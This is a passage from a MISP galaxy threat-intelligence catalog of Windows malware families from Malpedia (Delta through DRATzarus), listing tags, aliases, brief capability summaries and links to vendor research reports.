https://www.proofpoint.com/us/threat-insight/post/defray-new-ransomware-targeting-education-and-healthcare-verticals
https://www.proofpoint.com/us/blog/threat-insight/new-defray-ransomware-targets-education-and-healthcare-verticals
https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html
https://www.bleepingcomputer.com/news/security/government-software-provider-tyler-technologies-hit-by-ransomware/
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.secureworks.com/research/threat-profiles/gold-dupont
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

Delta(Alfa,Bravo, …)

The tag is: misp-galaxy:malpedia="Delta(Alfa,Bravo, …)"

Delta(Alfa,Bravo, …) is also known as:

Table 1701. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas

Dented

Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.

The tag is: misp-galaxy:malpedia="Dented"

Dented is also known as:

Table 1702. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dented

Deprimon

According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.

DePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.

The tag is: misp-galaxy:malpedia="Deprimon"

Deprimon is also known as:

Table 1703. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deprimon
https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/

DeputyDog

The tag is: misp-galaxy:malpedia="DeputyDog"

DeputyDog is also known as:

Table 1704. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html

DeriaLock

The tag is: misp-galaxy:malpedia="DeriaLock"

DeriaLock is also known as:

Table 1705. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock
https://twitter.com/struppigel/status/812601286088597505

DeroHE

DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.

The tag is: misp-galaxy:malpedia="DeroHE"

DeroHE is also known as:

Table 1706. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.derohe
https://www.bleepingcomputer.com/news/security/iobit-forums-hacked-to-spread-ransomware-to-its-members/

Derusbi (Windows)

A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.

The tag is: misp-galaxy:malpedia="Derusbi (Windows)"

Derusbi (Windows) is also known as:

PHOTO

Table 1707. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi
https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf
http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf
https://www.secureworks.com/research/threat-profiles/bronze-mohawk
https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html
https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf
https://www.secureworks.com/research/threat-profiles/bronze-firestone
https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf
https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf
https://www.secureworks.com/research/threat-profiles/bronze-keystone
https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family
https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf
https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/

Devil’s Rat

The tag is: misp-galaxy:malpedia="Devil’s Rat"

Devil’s Rat is also known as:

Table 1708. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat

Dexbia

The tag is: misp-galaxy:malpedia="Dexbia"

Dexbia is also known as:

CONIME

Table 1709. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia
https://vblocalhost.com/uploads/VB2020-Lunghi-Horejsi.pdf

Dexphot

Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources. It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.

The tag is: misp-galaxy:malpedia="Dexphot"

Dexphot is also known as:

Table 1710. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot
https://www.microsoft.com/security/blog/2019/11/26/insights-from-one-year-of-tracking-a-polymorphic-threat/

Dexter

The tag is: misp-galaxy:malpedia="Dexter"

Dexter is also known as:

LusyPOS

Table 1711. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter
https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware—Getting-Your-Hands-Dirty/
https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html
http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html
https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/
https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html

Dharma

According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.

Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.

The tag is: misp-galaxy:malpedia="Dharma"

Dharma is also known as:

Arena
Crysis
Wadhrama
ncov

Table 1712. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma
https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground
https://securelist.com/cis-ransomware/104452/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/
https://www.group-ib.com/media/iran-cybercriminals/
https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une
https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.acronis.com/en-us/articles/Dharma-ransomware/
https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.youtube.com/watch?v=LUxOcpIRxmg
https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware
https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack
https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://twitter.com/JakubKroustek/status/1087808550309675009
https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/

DiamondFox

The tag is: misp-galaxy:malpedia="DiamondFox"

DiamondFox is also known as:

Crystal
Gorynch
Gorynych

Table 1713. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox
https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF
https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/
https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/
http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/
https://blog.cylance.com/a-study-in-bots-diamondfox
https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced
https://www.scmagazine.com/inside-diamondfox/article/578478/

Diavol

A ransomware with potential ties to Wizard Spider.

The tag is: misp-galaxy:malpedia="Diavol"

Diavol is also known as:

Table 1714. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol
https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/
https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/
https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider
https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/
https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/
https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/

DILLJUICE

APT10’s fork of the (open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="DILLJUICE"

DILLJUICE is also known as:

Table 1715. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice
https://securelist.com/apt-trends-report-q1-2021/101967/
https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html

Dimnie

The tag is: misp-galaxy:malpedia="Dimnie"

Dimnie is also known as:

Table 1716. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie
http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/

DirCrypt

The tag is: misp-galaxy:malpedia="DirCrypt"

DirCrypt is also known as:

Table 1717. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt
https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

DirtyMoe

The tag is: misp-galaxy:malpedia="DirtyMoe"

DirtyMoe is also known as:

Table 1718. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe
https://decoded.avast.io/martinchlumecky/dirtymoe-3/
https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/
https://decoded.avast.io/martinchlumecky/dirtymoe-1/

DispCashBR

The tag is: misp-galaxy:malpedia="DispCashBR"

DispCashBR is also known as:

Table 1719. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr
https://twitter.com/r3c0nst/status/1232944566208286720
https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/

DispenserXFS

The tag is: misp-galaxy:malpedia="DispenserXFS"

DispenserXFS is also known as:

Table 1720. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs
https://twitter.com/cyb3rops/status/1101138784933085191

DistTrack

The tag is: misp-galaxy:malpedia="DistTrack"

DistTrack is also known as:

Shamoon

Table 1721. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack
http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/
https://content.fireeye.com/m-trends/rpt-m-trends-2017
http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware
https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon
http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412
https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://securelist.com/shamoon-the-wiper-copycats-at-work/
https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon
https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf
https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf
https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis
https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/
https://malwareindepth.com/shamoon-2012/
https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks

Divergent

The tag is: misp-galaxy:malpedia="Divergent"

Divergent is also known as:

Novter

Table 1722. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent
https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/
https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf
https://blog.talosintelligence.com/2019/09/divergent-analysis.html
https://www.cert-pa.it/notizie/devergent-malware-fileless/
https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/

Diztakun

The tag is: misp-galaxy:malpedia="Diztakun"

Diztakun is also known as:

Table 1723. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun
https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

DMA Locker

The tag is: misp-galaxy:malpedia="DMA Locker"

DMA Locker is also known as:

Table 1724. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker
https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/
https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/
https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/

DMSniff

DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.

The tag is: misp-galaxy:malpedia="DMSniff"

DMSniff is also known as:

Table 1725. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff
https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/

DneSpy

DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.

The tag is: misp-galaxy:malpedia="DneSpy "

DneSpy is also known as:

Table 1726. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dnespy
https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

DNSChanger

The tag is: misp-galaxy:malpedia="DNSChanger"

DNSChanger is also known as:

Table 1727. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger
https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/

DNSMessenger

DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.

The tag is: misp-galaxy:malpedia="DNSMessenger"

DNSMessenger is also known as:

TEXTMATE

Table 1728. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/
https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html
https://blog.talosintelligence.com/2017/03/dnsmessenger.html

DNSpionage

The tag is: misp-galaxy:malpedia="DNSpionage"

DNSpionage is also known as:

Agent Drable
AgentDrable
Webmask

Table 1729. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage
https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/
https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/
https://www.us-cert.gov/ncas/alerts/AA19-024A
https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
https://nsfocusglobal.com/apt34-event-analysis-report/
https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.secureworks.com/research/threat-profiles/cobalt-edgewater
https://marcoramilli.com/2019/04/23/apt34-webmask-project/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

DogHousePower

DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.

The tag is: misp-galaxy:malpedia="DogHousePower"

DogHousePower is also known as:

Shelma

Table 1730. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower
http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf

donut_injector

The tag is: misp-galaxy:malpedia="donut_injector"

donut_injector is also known as:

Table 1731. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

DoppelDridex

DoppelDridex is a fork of Indrik Spider’s Dridex malware. DoppelDridex has been run as a parallel operation to Dridex with a different malware versioning system, different RSA key, and with different infrastructure.

The tag is: misp-galaxy:malpedia="DoppelDridex"

DoppelDridex is also known as:

Table 1732. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex
https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document?&web_view=true
https://redcanary.com/blog/grief-ransomware/
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://security-soup.net/doppeldridex-delivered-via-slack-and-discord/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

DoppelPaymer

Doppelpaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: ".how2decrypt.txt".

The tag is: misp-galaxy:malpedia="DoppelPaymer"

DoppelPaymer is also known as:

Pay OR Grief

Table 1733. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer
https://www.bleepingcomputer.com/news/security/foxconn-electronics-giant-hit-by-ransomware-34-million-ransom/
https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/
https://sites.temple.edu/care/ci-rw-attacks/
https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf
https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/
https://techcrunch.com/2020/03/01/visser-breach/
https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/
https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.zscaler.com/blogs/security-research/doppelpaymer-continues-cause-grief-through-rebranding
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf
https://www.bleepingcomputer.com/news/security/laptop-maker-compal-hit-by-ransomware-17-million-demanded/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://www.ic3.gov/Media/News/2020/201215-1.pdf
https://twitter.com/vikas891/status/1385306823662587905
https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf
https://apnews.com/article/virus-outbreak-elections-georgia-voting-2020-voting-c191f128b36d1c0334c9d0b173daa18c
https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.heise.de/news/Uniklinik-Duesseldorf-Ransomware-DoppelPaymer-soll-hinter-dem-Angriff-stecken-4908608.html
https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/
https://www.secureworks.com/research/threat-profiles/gold-heron
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.trendmicro.com/en_us/research/21/a/an-overview-of-the-doppelpaymer-ransomware.html
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://redcanary.com/blog/grief-ransomware/
https://twitter.com/AltShiftPrtScn/status/1385103712918642688
http://www.secureworks.com/research/threat-profiles/gold-heron
https://medium.com/s2wlab/operation-synctrek-e5013df8d167
https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf
https://intel471.com/blog/ransomware-attack-access-merchants-infostealer-escrow-service/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

NgrBot

The tag is: misp-galaxy:malpedia="NgrBot"

NgrBot is also known as:

Table 1734. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot
https://krebsonsecurity.com/2019/10/mariposa-botnet-author-darkcode-crime-forum-admin-arrested-in-germany/
https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/
http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html
https://research.checkpoint.com/dorkbot-an-investigation/

Dorshel

The tag is: misp-galaxy:malpedia="Dorshel"

Dorshel is also known as:

Table 1735. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

Dot Ransomware

The tag is: misp-galaxy:malpedia="Dot Ransomware"

Dot Ransomware is also known as:

MZP Ransomware

Table 1736. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware
https://dissectingmalwa.re/nice-decorating-let-me-guess-satan-dot-mzp-ransomware.html

DOUBLEBACK

The tag is: misp-galaxy:malpedia="DOUBLEBACK"

DOUBLEBACK is also known as:

Table 1737. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback
https://www.fireeye.com/blog/threat-research/2021/05/unc2529-triple-double-trifecta-phishing-campaign.html

DoubleFantasy (Windows)

The tag is: misp-galaxy:malpedia="DoubleFantasy (Windows)"

DoubleFantasy (Windows) is also known as:

VALIDATOR

Table 1738. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy
https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/
https://twitter.com/Int2e_/status/1294565186939092994

DoublePulsar

The tag is: misp-galaxy:malpedia="DoublePulsar"

DoublePulsar is also known as:

Table 1739. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar
https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit
https://github.com/countercept/doublepulsar-c2-traffic-decryptor
https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/
https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/

Downdelph

The tag is: misp-galaxy:malpedia="Downdelph"

Downdelph is also known as:

DELPHACY

Table 1740. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph
https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://labs.sentinelone.com/a-deep-dive-into-zebrocys-dropper-docs/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

Downeks

The tag is: misp-galaxy:malpedia="Downeks"

Downeks is also known as:

Table 1741. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/
http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412

DownPaper

DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download and run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.

The tag is: misp-galaxy:malpedia="DownPaper"

DownPaper is also known as:

Table 1742. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper
https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
http://www.clearskysec.com/charmingkitten/

Downrage

simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key

The tag is: misp-galaxy:malpedia="Downrage"

Downrage is also known as:

GAMEFISH

Table 1743. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/
https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

DramNudge

The tag is: misp-galaxy:malpedia="DramNudge"

DramNudge is also known as:

Table 1744. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge

DRATzarus

The tag is: misp-galaxy:malpedia="DRATzarus"

DRATzarus is also known as:

Table 1745. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus
